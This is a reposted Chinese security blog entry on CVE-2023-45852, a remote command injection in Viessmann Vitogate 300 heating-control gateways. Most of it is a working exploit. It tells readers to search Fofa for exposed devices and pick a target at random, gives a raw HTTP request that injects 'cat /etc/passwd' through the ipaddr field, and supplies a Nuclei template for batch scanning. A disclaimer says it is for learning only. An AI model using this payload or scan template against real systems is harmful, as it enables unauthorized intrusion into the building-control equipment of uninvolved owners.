Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

admin
admin
admin
103400
文章
87
评论
2023年11月6日11:45:18评论48 views字数 2203阅读7分20秒阅读模式

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

漏洞简介

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

Viessmann VitogateViessmann公司的一个智能化控制系统。


Viessmann Vitogate 300 2.1.3.0版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者绕过身份验证,并通过put方法的ipaddr参数执行任意命令。


Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

影响版本

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)


Viessmann Vitogate_300_Firmware <= 2.1.3.0,Viessmann Vitogate_300

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

漏洞复现

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)


步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#搜索语法title="Vitogate 300"

步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求包内容。

POST /cgi-bin/vitogate.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: langCookie=enUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 91
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

批量脚本

Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)


id: CVE-2023-45852
info:  name: Viessmann Vitogate 300 - Remote Code Execution  author:Dreamkoi  severity: critical  description: |    In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.  reference:    - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html    - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md    - https://nvd.nist.gov/vuln/detail/CVE-2023-45852  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.8    cve-id: CVE-2023-45852    cwe-id: CWE-77    epss-score: 0.1097    epss-percentile: 0.94493    cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*  metadata:    verified: true    max-request: 1    vendor: viessmann    product: vitogate_300_firmware    shodan-query: title:"Vitogate 300"    fofa-query: title="Vitogate 300"  tags: cve,cve2023,rce,vitogate
http:  - raw:      - |        POST /cgi-bin/vitogate.cgi HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json
        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{randstr}};cat /etc/passwd"}}
    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains_all(header, "application/json")'          - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")'        condition: and

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!



Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

扫码获取更多精彩






原文始发于微信公众号(揽月安全团队):Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月6日11:45:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Viessmann Vitogate远程代码执行漏洞(CVE-2023-45852)http://cn-sec.com/archives/2179601.html

发表评论

匿名网友 填写信息